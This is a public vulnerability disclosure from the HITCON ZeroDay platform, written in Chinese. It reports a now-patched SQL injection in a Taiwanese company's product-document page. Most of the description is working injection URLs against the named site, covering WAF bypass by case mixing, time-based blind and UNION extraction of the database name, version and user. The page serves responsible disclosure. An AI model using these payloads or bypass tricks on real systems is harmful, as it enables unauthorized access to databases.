Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2025-00055
- 發信 Vendor: 興誠科技股份有限公司
- Title: 興誠科技股份有限公司 SQLi
- Introduction: SQL注入
處理狀態
目前狀態
-
新提交
-
已審核
-
已通報
-
已修補
-
已複測
-
公開
處理歷程
- 2025/01/09 21:59:46 : 新提交 (由 {{萌新}} 更新此狀態)
- 2025/01/09 22:01:14 : 新提交 (由 {{萌新}} 更新此狀態)
- 2025/01/10 13:47:38 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/01/17 17:17:48 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/01/17 17:17:48 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/02/10 16:16:14 : 複測申請中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/02/10 17:40:32 : 確認已修補 (由 {{萌新}} 更新此狀態)
- 2025/02/10 17:40:46 : 確認已修補 (由 {{萌新}} 更新此狀態)
- 2025/02/14 03:05:11 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2025-00055
- 通報者:nhd1261 ({{萌新}})
- 風險:高
- 類型:資料庫注入攻擊 (SQL Injection)
參考資料
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
相關網址
敘述
p參數添加單引號後報錯,因為存在防火牆阻擋自動化腳本,所以手動注入,並透過大小寫混淆、+代替空格等繞過基本的過濾。
經典的' or '1'='1' --。
http://www.elogic.com.tw/html/download/product_doc.php?p=MM%27oR++%27asgh%27+lIKe+%27asgh%27+--+%27
時間盲注,有明顯延遲。
http://www.elogic.com.tw/html/download/product_doc.php?p=MM%27++aNd+SleEp(3)++--+%27
UNION查詢注入,先用order by確定列數,8個不報錯,9個報錯,列數為8。
http://www.elogic.com.tw/html/download/product_doc.php?p=MM%27++oRdeR+bY+++8+--+%27
確認哪幾列可以顯示資料,測試可看出2、3、5列可用來顯示資料。
http://www.elogic.com.tw/html/download/product_doc.php?p=-112%27uNion+++sEleCT++aLl+++1,2,3,4,5,6,7,8+++--+%27
查看版本、當前SQL帳號、資料庫名稱,發現居然是root,但還好有啟用secure_file_priv,讀寫擋權限被限制。
http://www.elogic.com.tw/html/download/product_doc.php?p=-112%27uNion++sEleCT++aLl+++1,datAbaSe(),vErSIoN(),4,UsEr(),6,7,8++--+%27
修補建議
對敏感字元過濾,使用參數化查詢,防火牆不是無敵的。